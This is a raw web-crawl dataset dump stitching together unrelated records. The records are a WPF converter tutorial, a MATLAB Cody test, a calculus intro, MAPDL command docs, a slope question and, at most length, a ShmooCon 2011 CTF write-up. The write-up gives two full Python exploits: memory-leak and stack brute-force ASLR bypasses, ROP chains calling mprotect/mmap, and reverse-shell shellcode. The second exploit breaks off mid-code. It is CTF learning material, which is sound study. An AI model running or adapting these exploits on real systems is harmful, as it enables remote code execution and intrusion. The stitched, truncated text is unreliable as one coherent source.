URL
stringlengths
15
1.68k
text_list
listlengths
1
199
image_list
listlengths
1
199
metadata
stringlengths
1.19k
3.08k
https://www.c-sharpcorner.com/UploadFile/41e70f/converters-in-wpf/
[ "# Converters In WPF\n\nConverters provide substantial supremacy since they allow insertion of an object between a source and a target object. At a high level, converters are a chunk of custom code hooked up using the binding and the data will flow via that converter. So, whenever data is flown from a source to a target, one can change the value or can change the type of object that needs to be set on the target property.\n\nSo, whenever data travels from source to target, it can be transformed in two ways:\n\n1. Data value: Here the transformation will be done with just the value by keeping the data type intact. For example, for number fields, you can transform a value from a floating point number to an integer by keeping the actual value as a float.\n2. Data type: One can also transform the data type. For example, setting a style based on some Boolean flag. This is one of the most common examples, isn't it?\n\nDefining a converter\n\nDefining any converter requires implementation of an IValueConverter interface in a class. This interface has the following two methods:\n\n1. Convert: Is called when data is flowing from a source to a target\n2. ConvertBack: Is called when data is flowing from a target to a source. It is basically useful in two-way binding scenarios.\n\nWhere to place converters\n\nTo implement an IValueConverter one must create a class and then put the instance of that class in a ResourceDictionary within your UI.\n\nHow to use\n\nOnce your class is part of a ResourceDictionary, you can point to the instance of the converter using the Converter property of Binding, along with a StaticResource markup extension.\n\nUsing Code\n\nBefore digging into the code, let's discuss what I want to do with the following code snippet. Whenever the value entered by the user is negative, I want to display 0 with * as a final amount.\n\nSo, let's start by creating a class called RoundingOffConverter and inherit IValueConverter as shown below:\n\nIn the class above, the Convert method will be called when the direction of data flow is from a source to a target. The value object is the one that we will set here, the targetType will tell you the type of the target property, next is an optional parameter and the last one is for culture.\n\nThe ConvertBack method will be called when you have two-way data binding and the direction of data flow is from the target to the source object.\n\nCode for using Data Value\n\nSo, to satisfy our requirements, let's replace the default convert methods to our own implementation as in the following:\n\nTo make this example simple, I am simply creating 2 properties in code behind as in the following:\n\nNow coming to XAML, first I need to add a reference of my converter class and then need to add that as a resource. It goes, here:\n\nOnce the reference is added, I need to bind this converter to my TextBox object as in the following:\n\nOnce everything is in place, let's run this application. You will find the following output:\n\nCode for using Data Type: Here the purpose is to select a style based on a Boolean property, or in other words, the user wants to change the color of a text box based on the checkbox status. So let's proceed to and write our BoolToStyleConverter.\n\nAs before, quickly create a class for this new converter as in the following:\n\nThe next step is to create styles in App.xaml. It can be done as in the following:\n\nNow in order to use the styles above in an application, one must add these as a Window Resources as shown below:\n\nOnce the converter is added to resources, the next step is to use this converter in our UI. So, let's add:\n\nWe are done. Now quickly run this application and you will find the color change based on the text box as in the following:\n\nI hope this tutorial on converters was useful.\n\nRecommended Ebook", null, "# WPF Simplified: Build Windows Apps Using C# and XAML", null, "", null, "" ]
[ null, "https://f4n3x6c5.stackpathcdn.com/UploadFile/EBooks/08192022071824AM/11162022111110AM08192022072003AMEbook-Cover---WPF-Simplified-Fundamental-approach-to-WP-F--Basics-to-Advance.png", null, "https://www.c-sharpcorner.com/images/category/trophy.png", null, "https://www.c-sharpcorner.com/images/category/certificates-img.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.90743506,"math_prob":0.7476819,"size":3758,"snap":"2022-40-2023-06","text_gpt3_token_len":794,"char_repetition_ratio":0.13771977,"word_repetition_ratio":0.03106509,"special_character_ratio":0.20516232,"punctuation_ratio":0.10079575,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9622596,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,2,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-02-06T23:05:31Z\",\"WARC-Record-ID\":\"<urn:uuid:92ee1a1d-5dc0-45c4-88f3-20a6c84f4d5e>\",\"Content-Length\":\"165141\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:975bb289-7f31-4f53-a11d-8d61e4ad35b5>\",\"WARC-Concurrent-To\":\"<urn:uuid:8fb4a750-6da5-41ad-b856-cdb913f2877d>\",\"WARC-IP-Address\":\"40.65.205.118\",\"WARC-Target-URI\":\"https://www.c-sharpcorner.com/UploadFile/41e70f/converters-in-wpf/\",\"WARC-Payload-Digest\":\"sha1:WJMRQGLCJ3WYEJX7AVOCDRYKHKAHDYT3\",\"WARC-Block-Digest\":\"sha1:FSBCBNUJMNQIFFTS5EQYBCF7IFL73ARR\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764500365.52_warc_CC-MAIN-20230206212647-20230207002647-00326.warc.gz\"}"}
https://uk.mathworks.com/matlabcentral/cody/problems/411-back-to-basics-21-matrix-replicating/solutions/466725
[ "Cody\n\n# Problem 411. Back to basics 21 - Matrix replicating\n\nSolution 466725\n\nSubmitted on 6 Jul 2014 by Nishat Savat\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\n%% x = ; y_correct = [1 1;1 1]; assert(isequal(matrix_replication(x),y_correct))\n\n2   Pass\n%% x = [1 2;3 4]; y_correct = [1 2 1 2; 3 4 3 4; 1 2 1 2; 3 4 3 4]; assert(isequal(matrix_replication(x),y_correct))\n\n3   Pass\n%% x = [1 2]; y_correct = [1 2 1 2; 1 2 1 2]; assert(isequal(matrix_replication(x),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.52418226,"math_prob":0.9901351,"size":532,"snap":"2019-51-2020-05","text_gpt3_token_len":201,"char_repetition_ratio":0.16098484,"word_repetition_ratio":0.10989011,"special_character_ratio":0.42669174,"punctuation_ratio":0.13392857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95537335,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-10T07:42:23Z\",\"WARC-Record-ID\":\"<urn:uuid:07b89b15-48ef-493b-86cb-f4c49ac85784>\",\"Content-Length\":\"73528\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2205f105-2fcc-4ef2-b46a-663920f63e43>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a4a5cb1-b8b4-44a5-bbf4-cf7591d2fab0>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://uk.mathworks.com/matlabcentral/cody/problems/411-back-to-basics-21-matrix-replicating/solutions/466725\",\"WARC-Payload-Digest\":\"sha1:H4JTOGKU5ASS3LOIQI46MQZ56IN6PIFM\",\"WARC-Block-Digest\":\"sha1:6PYW4I2CLPLE4NH6HUSNDOCLLSMDYOWG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540527010.70_warc_CC-MAIN-20191210070602-20191210094602-00151.warc.gz\"}"}
https://sites.und.edu/timothy.prescott/apex/web/apex.Ch11.Sx1.html
[ "# Chapter Introduction\n\nThis chapter introduces a new mathematical object, the vector. Defined in Section 11.2, we will see that vectors provide a powerful language for describing quantities that have magnitude and direction. A simple example of such a quantity is force: when applying a force, one is generally interested in how much force is applied (i.e., the magnitude of the force) and the direction in which the force is applied. Vectors will play an important role in many of the subsequent chapters in this text.\n\nThis chapter begins with moving our mathematics out of the plane and into “space.” That is, we begin to think mathematically not only in two dimensions, but in three. With this foundation, we can explore vectors both in the plane and in space.", null, "" ]
[ null, "http://a.ou.und.edu/servlet/OX/oucampus/ob.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9450352,"math_prob":0.88079894,"size":740,"snap":"2023-14-2023-23","text_gpt3_token_len":151,"char_repetition_ratio":0.11413044,"word_repetition_ratio":0.0,"special_character_ratio":0.2027027,"punctuation_ratio":0.12328767,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99649405,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T00:41:45Z\",\"WARC-Record-ID\":\"<urn:uuid:82539694-dc98-489b-afcf-40336f203ff4>\",\"Content-Length\":\"16229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:d986eaa6-62d4-4c0b-97d7-aac82b60ac15>\",\"WARC-Concurrent-To\":\"<urn:uuid:74d35d8d-54a0-44f4-a7e7-a9ac671066dc>\",\"WARC-IP-Address\":\"134.129.182.41\",\"WARC-Target-URI\":\"https://sites.und.edu/timothy.prescott/apex/web/apex.Ch11.Sx1.html\",\"WARC-Payload-Digest\":\"sha1:UFSCWIOCBCHAGJWHPB33BOFQ3JFNXMWZ\",\"WARC-Block-Digest\":\"sha1:GSWYXKIXFCLPOAF6RJMKGHPHOAANSWX5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649348.41_warc_CC-MAIN-20230603233121-20230604023121-00045.warc.gz\"}"}
https://mapdldocs.pyansys.com/mapdl_commands/solution/_autosummary/ansys.mapdl.core.Mapdl.dsym.html
[ "# dsym¶\n\nMapdl.dsym(lab='', normal='', kcn='', **kwargs)\n\nSpecifies symmetry or antisymmetry degree-of-freedom constraints on\n\nAPDL Command: DSYM nodes.\n\nParameters\nlab\n\nSymmetry label:\n\nSYMM - Generate symmetry constraints as described below (default).\n\nASYM - Generate antisymmetry constraints as described below.\n\nnormal\n\nSurface orientation label to determine the constraint set (surface is assumed to be perpendicular to this coordinate direction in coordinate system KCN):\n\nX - Surface is normal to coordinate X direction (default). Interpreted as R\n\ndirection for non-Cartesian coordinate systems.\n\nY - Surface is normal to coordinate Y direction. θ direction for non-Cartesian\n\ncoordinate systems.\n\nZ - Surface is normal to coordinate Z direction. Φ direction for spherical or\n\ntoroidal coordinate systems.\n\nkcn\n\nReference number of global or local coordinate system used to define surface orientation.\n\nNotes\n\nSpecifies symmetry or antisymmetry degree-of-freedom constraints on the selected nodes. The nodes are first automatically rotated (any previously defined rotations on these nodes are redefined) into coordinate system KCN, then zero-valued constraints are generated, as described below, on the selected degree-of-freedom set (limited to displacement, velocity, and magnetic degrees of freedom) [DOFSEL]. Constraints are defined in the (rotated) nodal coordinate system, as usual. See the D and NROTAT commands for additional details about constraints and nodal rotations.\n\nThis command is also valid in PREP7.\n\nSymmetry or antisymmetry constraint generations are based upon the valid degrees of freedom in the model, i.e., the degrees of freedom associated with the elements attached to the nodes. The labels for degrees of freedom used in the generation depend on the Normal label.\n\nFor displacement degrees of freedom, the constraints generated are:\n\nFor velocity degrees of freedom, the constraints generated are:\n\nFor magnetic degrees of freedom, the SYMM label generates flux normal conditions (flux flows normal to the surface). Where no constraints are generated, the flux normal condition is “naturally” satisfied. The ASYM label generates flux parallel conditions (flux flows parallel to the surface)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.79428077,"math_prob":0.90089434,"size":2219,"snap":"2022-05-2022-21","text_gpt3_token_len":454,"char_repetition_ratio":0.16072235,"word_repetition_ratio":0.0754717,"special_character_ratio":0.18927445,"punctuation_ratio":0.11716621,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96888334,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-19T02:05:16Z\",\"WARC-Record-ID\":\"<urn:uuid:f57054f0-cbf6-4e44-b60b-b8603bfb4e20>\",\"Content-Length\":\"29746\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1ef2cca3-38be-4cec-9627-8eab187f32a7>\",\"WARC-Concurrent-To\":\"<urn:uuid:c1f78431-d9c5-4dbc-abeb-b13bcf990ba0>\",\"WARC-IP-Address\":\"185.199.111.153\",\"WARC-Target-URI\":\"https://mapdldocs.pyansys.com/mapdl_commands/solution/_autosummary/ansys.mapdl.core.Mapdl.dsym.html\",\"WARC-Payload-Digest\":\"sha1:G3D5KJJK3M4D2G5JSIK7C5BE6KBZGNBZ\",\"WARC-Block-Digest\":\"sha1:CV3HCHJCZ7JSK4YM5WRTSZTFI7WMPKNO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662522741.25_warc_CC-MAIN-20220519010618-20220519040618-00574.warc.gz\"}"}
https://web2.0calc.com/questions/help-please_32924
[ "+0\n\n0\n203\n1\n\n1. Describe, using similar triangles, why a line going down from left to right has a negative slope.\n\n2.  Describe the steepness of a horizontal line using the slope ratio, RISE/RUN\n.\n\nOct 19, 2018\n\n#1\n+1\n\nHere's the second one\n\nA horizontal line  has \"0\" rise and an infinite run\n\nSo  the slope is\n\n0 / run  =   0", null, "", null, "", null, "Oct 19, 2018" ]
[ null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null, "https://web2.0calc.com/img/emoticons/smiley-cool.gif", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86130613,"math_prob":0.82340986,"size":282,"snap":"2020-10-2020-16","text_gpt3_token_len":72,"char_repetition_ratio":0.14028777,"word_repetition_ratio":0.0,"special_character_ratio":0.25531915,"punctuation_ratio":0.11666667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9680725,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-21T15:04:43Z\",\"WARC-Record-ID\":\"<urn:uuid:fb20c7ea-7797-49fd-985f-13970ff6e519>\",\"Content-Length\":\"22339\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cdefaac6-f56f-4351-b88a-d39afa886261>\",\"WARC-Concurrent-To\":\"<urn:uuid:aebf265a-ee9f-4c28-8689-7f8516e6e51e>\",\"WARC-IP-Address\":\"209.126.117.101\",\"WARC-Target-URI\":\"https://web2.0calc.com/questions/help-please_32924\",\"WARC-Payload-Digest\":\"sha1:JIHFLOEPHX2TWCTC6J5XUBSIUBXCS3YY\",\"WARC-Block-Digest\":\"sha1:ACAZLMJ7KHFGNYQUIM5JEJZU6VZJVLCN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875145533.1_warc_CC-MAIN-20200221142006-20200221172006-00442.warc.gz\"}"}
https://blog.stalkr.net/2011/01/shmoocon-ctf-warmup-contest-javascrimpd.html?showComment=1294978990935
[ "## Friday, January 14, 2011\n\n### ShmooCon CTF Warmup Contest - JavaScrimpd\n\nLast week-end was ShmooCon CTF Warmup Contest (aka Ghost in the Shellcode 2011). Three challenges, the last one being an ELF binary + hostname of a server.\n\nCongrats to awesie/zoaedk & tylerni7 of team PPP for solving it pretty quickly. And since they explained the level pretty well, I really invite you to read their solution.\n\n### Valuable binary information\n\nIn addition to reading the SSH banner, the binary informs us that it has been compiled under Ubuntu with gcc 4.3.3:\n```\\$ objdump -s -j .comment 063ad0c8271898d6c5e3e83701211f6-JavaScrimpd\n\nContents of section .comment:\n0000 4743433a 20285562 756e7475 20342e34 GCC: (Ubuntu 4.4\n0010 2e332d34 7562756e 74753529 20342e34 .3-4ubuntu5) 4.4\n0020 2e3300 .3.\n```\n\nand that it's using libmozjs from xulrunner package 1.9.2.13:\n```\\$ readelf -d 6063ad0c8271898d6c5e3e83701211f6-JavaScrimpd\nDynamic section at offset 0x1f10 contains 23 entries:\nTag Type Name/Value\n0x00000001 (NEEDED) Shared library: [libmozjs.so]\n0x00000001 (NEEDED) Shared library: [libc.so.6]\n0x0000000f (RPATH) Library rpath: [/usr/lib/xulrunner-1.9.2.13/]\n[...]\n```\nThese information are really valuable to work with the same libmozjs.so as the server, in order to ease remote exploitation.\n\n### Exploit using send() memory leak\n\nUsing the same techniques I made my own exploit and challenged myself to make it work under ASLR in addition to NX. In order to do that, we need to:\n• automatically calculate remote base address of libmozjs using JS's socket.send() memory leak, by trying several addresses: last 12 bits should be the same, decrementing their offset should give same base address\n• send a payload and get its address in the heap, again using socket.send() memory leak to find heap1/heap2 addresses as explained by awesie\nI tried to make the exploit code portable and verbose enough to understand. Also, you can give any shellcode - I used a very common shell_reverse_tcp from metasploit.\n\nExploit (3.py):\n```#!/usr/bin/env python\n# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3\n# Based on awesie/tylerni7 solution http://ppp.cylab.cmu.edu/wordpress/?p=410\n# Automatically finds addresses => ASLR proof!\nfrom sys import argv, exit\nfrom struct import pack, unpack\nfrom socket import *\n\n# ./3.py [host (default localhost)] [port (default 2426)]\nhost = argv if len(argv)>1 else \"localhost\"\nport = int(argv) if len(argv)>2 else 2426\n\n# pivot gadget - leave (mov esp,ebp ; pop ebp) ; ret\npivot_leave = 0x8048c56\n\n# offset of mprotect@PLT in libmozjs\nmprotect_plt_offset = 0xEEF0\n# ebx value to call mprotect through GOT/PLT of shared library\n# obtained these values from libmozjs.so:.text:001359A2  add ebx, 1848Ah\nlibmozjs_ebx = 0x1359A2 + 0x1848A\n\n# some addresses of functions found locally in the memory leak\n# with the following base address for libmozjs\nba = 0xb7e78000\n\ndef connect():\ns = socket(AF_INET, SOCK_STREAM)\ns.connect((host,port))\nreturn s\n\ndef leak_js(length=0x100, string=\"AAAA\", timout=1):\ns = connect()\ns.settimeout(timout)\ns.send(\"a=new Socket();a.send('%s',%i);a.recv(0);\" % (string, length))\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef build_js(p, sendsize, recvsize):\njs  = \"a=new Socket();\"\njs += \"s='%s';\" % (\"\".join(\"\\\\x%02x\"%ord(c) for c in p))\njs += \"a.send(s,%i);\" % sendsize\njs += \"a.recv(%i);\" % recvsize\nreturn (js+\"//\").ljust(1024,\"X\")\n\n# 00000000  41 42 42 42 00 14 e8 b7  77 00 20 00 19 00 00 00  |ABBB....w. .....|\n# 00000010  00 00 00 00 60 e4 00 01  00 23 07 08 c8 3d 07 08  |....`....#...=..|\n#            heap1       heap2, points to buffer=ABBB\n# obtain heap1/heap2 addresses with simple buffer\nmem = leak_js(0x20, \"ABBB\")\nheap1 = unpack(\"<I\", mem[-8:-4])\nheap2 = unpack(\"<I\", mem[-4:])\nif mem[0:4]==\"ABBB\" and (heap1>>16)==(heap2>>16):\nhigher_bytes = pack(\"<H\", heap1>>16)\n# for some length, heap doesn't display heap1/heap2 addresses\n# so try to pad our payload until it displays it and we find it\nfor i in range(32):\ns = connect()\ns.send(build_js(\"A\"+\"B\"*(send-1), send+leak, 0))\nmem = s.recv(send+leak)\ns.close()\n# try to find heap1/heap2 by matching higher bytes found previously\nh = mem.find(higher_bytes, send)\nheap1 = unpack(\"<I\", mem[h-2:h+2])\nheap2 = unpack(\"<I\", mem[h+2:h+6])\nif (heap1>>16)==(heap2>>16):\nreturn heap2, i\nsend += 1\nprint 'unable to find heap address of buffer'\nexit(1)\n\ndef get_libmozjs_ba():\nmem = leak_js(0x5000)\nguess1, guess2, guess3 = 0,0,0\nfor i in range(0,len(mem),4):\na = unpack(\"<I\", mem[i:i+4])\n# try to match addresses we found locally and for\n# which we calculated offset to library base address\nguess1 = a - (addr1 - ba)\nguess2 = a - (addr2 - ba)\nguess3 = a - (addr3 - ba)\nif guess1>0 and guess2>0 and guess3>0 and guess1==guess2==guess3:\nreturn guess1\nprint 'unable to get libmozjs base address'\nexit(1)\n\ndef exploit(SC):\nrop  = \"MPRO\"\nrop += \"RETN\" # where to return after call\nrop += \"HEAP\" # const void *addr\nrop += pack(\"<I\", 0x1000) # size_t len\nrop += pack(\"<I\", 0x7) # int prot\n\nlibmozjs_ba = get_libmozjs_ba()\nprint \"Assuming libmozjs base address at 0x%08x\" % libmozjs_ba\n\nleak = 64\nprint \"Assuming heap buffer at 0x%08x with %i padding\" % (heap, pad)\n\n# mprotect@plt offset\nmprotect = libmozjs_ba + mprotect_plt_offset\n# fix ebx for call\nebx = libmozjs_ba + libmozjs_ebx\n\nrop = rop.replace(\"MPRO\", pack(\"<I\",mprotect))\nrop = rop.replace(\"HEAP\", pack(\"<I\",heap))\nrop = rop.replace(\"RETN\", pack(\"<I\",heap+len(rop)))\n\n# stack-based buffer overflow\np  = \"A\"*1052\np += pack(\"<I\",ebx) # ebx\np += pack(\"<I\",heap-4) # sebp, address of new stack\np += pack(\"<I\",pivot_leave) # seip, pivot (leave; ret)\n\ns = connect()\ns.send(build_js(rop+SC, len(rop+SC)+leak, len(p)))\ns.send(p)\ns.close()\nprint \"Done. Have shell?\"\n\n# Shellcode to use\n# msfpayload linux/x86/shell_reverse_tcp LHOST=\"127.0.0.1\" LPORT=\"1337\" R |hexdump -ve '\"\\\\\\x\" 1/1 \"%02x\"'; echo;\nSC = \"\\x31\\xdb\\xf7\\xe3\\x53\\x43\\x53\\x6a\\x02\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x5b\\x5e\\x68\\x7f\\x00\\x00\\x01\\x66\\x68\\x05\\x39\\x66\\x53\\x6a\\x10\\x51\\x50\\x89\\xe1\\x43\\x6a\\x66\\x58\\xcd\\x80\\x59\\x87\\xd9\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\n\nexploit(SC)```\n\nIt gives:\n```\\$ ./3.py\nAssuming libmozjs base address at 0xb7673000\nAssuming heap buffer at 0x08ccfe30 with 0 padding\nDone. Have shell?\n# and new connection appears in the listening netcat\n```\n\n### Exploit not using send() memory leak: stack brute-force\n\nBack to recv() stack-based buffer overflow. Right after the saved instruction pointer (seip) is the first arg of the function - a pointer to JS context - which is used before reaching ret (by JS_strdup() and JS_newstring()). This is why we could not overwrite it and have a regular exploitation and had to use a leave/ret stack pivot into our buffer inside the JS code with our new stack.\n\nWe could overwrite context if we had its value. But how to get it without any memory leak? We can just brute-force it as if it was a stack cookie (see pi3's article in phrack #67). To distinguish good from bad results, we can add a send(\"it works\") in the JS code after the recv(). If we receive \"it works\" it means we correctly guessed context value, timeout meaning we failed. But doing this we also smash the saved base pointer (sebp) and saved instruction pointer (seip), so we need their value first. How? Same method, brute-force. All in all we have a 12 bytes byte per byte brute-force.\n\nNote: the stack brute-force works here because the server uses recv() (no extra character being added like with fgets()) and also because it only forks() and does not execve() itself again (in that case ASLR would change all addresses). In local it takes about 2 minutes to brute-force the 12-bytes (min 12 tries, max 256*12=3072 tries).\n\nWhat next? After using a pop+ret gadget to skip context and other stack variables that are unusable, we now have a regular stack-based buffer overflow. We can then return to send@PLT to send us back any memory area! The only problem is to provide the correct file descriptor, the one of our socket. Actually we can get it by using JS send(socket.fileno) before calling recv(), so we can send our buffer overflow payload using its value.\n\nSo now we have an arbitrary memory leak. Let's not fall into the first solution using libmozjs and choose another approach. Since the binary is not position independent, we know where it is mapped in memory, especially its GOT (Global Offset Table) section. There, we can find function pointers already resolved (since already called) and directly pointing to the libc: signal(), recv(), listen(), setuid(), etc. Assuming we have the same libc (we guessed Ubuntu version), we can then deduce remote libc base address.\n\nWhat if it is not the same libc but an obscure and different one? We can guess its base address and leak its content remotely using our arbitrary memory leak. Once fully obtained, we can read its content and find what we need.\n\nNow that we have access to any libc function, many solutions are possible. I chose to mmap() an rwx area, download a shellcode over the socket using recv() (with the same socket fileno leak I explained before) and return to it.\n\nAgain, I tried to make the exploit code portable and verbose enough to understand. Again, you can give any shellcode, I used the same connect-back as before.\n\nExploit (3b.py):\n```#!/usr/bin/env python\n# Solution for shmoocon barcode/ghost in the shellcode 2011, challenge #3\n# It does not use JS send() memory leak but brute-forces the stack (like an\n# SSP brute-force), so it becomes a regular stack-based buffer overflow.\n# We use send() to leak remote process memory and use this to find remote libc\n# base address by looking at resolved libc functions in binary's .got section.\n# Finally mmap() ourselves an rwx area, recv() a shellcode and return to it.\nfrom sys import argv, exit\nfrom struct import pack, unpack\nfrom time import sleep\nfrom socket import *\n\n# ./3b.py [host (default localhost)] [port (default 2426)]\nhost = argv if len(argv)>1 else \"localhost\"\nport = int(argv) if len(argv)>2 else 2426\n\npop_11 = 0x8049812 # add esp 0x1c (28) ; pop ebx ; pop esi ; pop edi ; pop ebp ;;\npop_4 = 0x8049815 # pop ebx ; pop esi ; pop edi ; pop ebp ;;\nsend_plt = 0x08048E98\nrecv_plt = 0x08048CB8\nexit_plt = 0x08048F58\n\ngot_plt_start, got_plt_end = 0x0804AFF4, 0x0804B0C8\n# Some libc functions already resolved by GOT/PLT\n# by the time we smash the stack\nsignal_got = 0x0804B00C\nrecv_got   = 0x0804B014\nlisten_got = 0x0804B01C\n\n# Functions in my libc and its base address during a local run\nmy_signal = 0xb7d48530\nmy_recv   = 0xb7deccb0\nmy_listen = 0xb7decc70\nmy_mmap   = 0xb7de7ee0\nmy_libc_ba = 0xb7d1e000\n\ndef connect():\ns = socket(AF_INET, SOCK_STREAM)\ns.connect((host,port))\nreturn s\n\ndef alive():\ns = connect()\ns.send(\"a=new Socket();a.send('ping\\\\n');\")\nr = s.recv(5)\ns.close()\nreturn r=='ping\\n'\n\ndef leak_js(length=0x100, string=\"AAAA\", timout=1):\ns = connect()\ns.settimeout(timout)\ns.send(\"a=new Socket();a.send('%s',%i);a.recv(0);\" % (string, length))\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef try_byte(current, byte, timout=0.3):\ns = connect()\ns.settimeout(timout)\np = \"A\"*(1056) + current + byte\nfound = False\ntry:\ns.send((\"a=new Socket();a.recv(\"+str(len(p))+\");a.send('HAI\\\\n')//\").ljust(1024,\"X\"))\ns.send(p)\nfound = s.recv(4)==\"HAI\\n\"\nexcept timeout, e:\npass\ns.close()\nreturn found\n\ndef find_byte(current, first_check=[]):\ntimout = 0.2 if host==\"localhost\" else 0.6\nfound = False\nfor i in first_check+list(set(range(256))-set(first_check)):\nif try_byte(current, chr(i), timout):\nfound = True\nprint \" * found byte 0x%02x\" % i\nreturn chr(i)\ntimout *= 2\nif alive():\nelse:\nexit(1)\n\ndef bf_stack():\nprint \"Brute-forcing the stack to get sebp, seip & context addresses\"\nsebp = ''\nsebp += find_byte(sebp,[0x68])\nsebp += find_byte(sebp,[0xeb])\nsebp += find_byte(sebp,[0xff])\nsebp += find_byte(sebp,[0xbf])\nseip = ''\nseip += find_byte(sebp+seip,[0xa7])\nseip += find_byte(sebp+seip,[0x47])\nseip += find_byte(sebp+seip,[0xee])\nseip += find_byte(sebp+seip,[0xb7])\ncontext = ''\ncontext += find_byte(sebp+seip+context,[0xd0])\ncontext += find_byte(sebp+seip+context,[0x56])\ncontext += find_byte(sebp+seip+context,[0x05])\ncontext += find_byte(sebp+seip+context,[0x08])\nsebp, seip, context = unpack(\"<I\",sebp), unpack(\"<I\",seip), unpack(\"<I\",context)\nprint \"Found: sebp, seip, context = 0x%08x, 0x%08x, 0x%08x\" % (sebp, seip, context)\nreturn (sebp, seip, context)\n\np = \"A\"*1060\np += pack(\"<I\", pop_11) # seip\np += pack(\"<I\", context) # do not smash context\np += pack(\"<I\", 0)*3 # unused\np += pack(\"<I\", context-4) # something writeable\np += pack(\"<I\", 0)*(11-5) # unused\nreturn p # after that goes the rop payload\n\ndef leak_mem(start,length):\np += pack(\"<I\", send_plt)\np += pack(\"<I\", pop_4)\np += \"FDNO\" # int fd\np += pack(\"<I\", start) # void *buf\np += pack(\"<I\", length) # size_t n\np += pack(\"<I\", 0) # int flags\np += pack(\"<I\", exit_plt)\n\ns = connect()\ns.send((\"a=new Socket();a.send(a.fileno);a.recv(\"+str(len(p))+\");//\").ljust(1024,\"X\"))\nfileno = unpack(\"<I\", s.recv(4))\np = p.replace(\"FDNO\", pack(\"<I\",fileno))\ns.send(p)\nr = ''\ntry:\nwhile len(r)<length:\nr += s.recv(length)\nexcept timeout, e:\npass\ns.close()\nreturn r\n\ndef get_libc_ba():\nmem = leak_mem(got_plt_start, got_plt_end-got_plt_start)\n\nsignal = unpack(\"<I\", mem[signal_got-got_plt_start:signal_got-got_plt_start+4])\nrecv   = unpack(\"<I\", mem[recv_got-got_plt_start:recv_got-got_plt_start+4])\nlisten = unpack(\"<I\", mem[listen_got-got_plt_start:listen_got-got_plt_start+4])\n\nguess1 = signal - (my_signal - my_libc_ba)\nguess2 = recv   - (my_recv   - my_libc_ba)\nguess3 = listen - (my_listen - my_libc_ba)\nif guess1==guess2==guess3:\nreturn guess1\nprint \"Could not find remote libc base address - maybe different version?\"\nprint \"You can try to leak it using leak_mem() progressively, then explore it to find needed offsets you need\"\nexit(1)\n\ndef exploit(SC, area=0x13370000, size=0x10000):\n\n# mmap an rwx area at 0x13370000\np += pack(\"<I\", libc + (my_mmap - my_libc_ba))\np += pack(\"<I\", pop_11)\np += pack(\"<I\", area) # void *addr\np += pack(\"<I\", size) # size_t length\np += pack(\"<I\", 0x7) # int prot - PROT_READ(0x1) | PROT_WRITE(0x2) | PROT_EXEC(0x4)\np += pack(\"<I\", 0x22) # int flags - MAP_ANONYMOUS(0x20) | MAP_PRIVATE(0x02)\np += pack(\"<I\", 0xffffffff) # int fd - MAP_ANONYMOUS => -1\np += pack(\"<I\", 0) # off_t offset\np += pack(\"<I\", 0)*(11-6) # unused\n\n# receive a shellcode in it\np += pack(\"<I\", recv_plt)\np += pack(\"<I\", pop_4)\np += \"FDNO\" # int 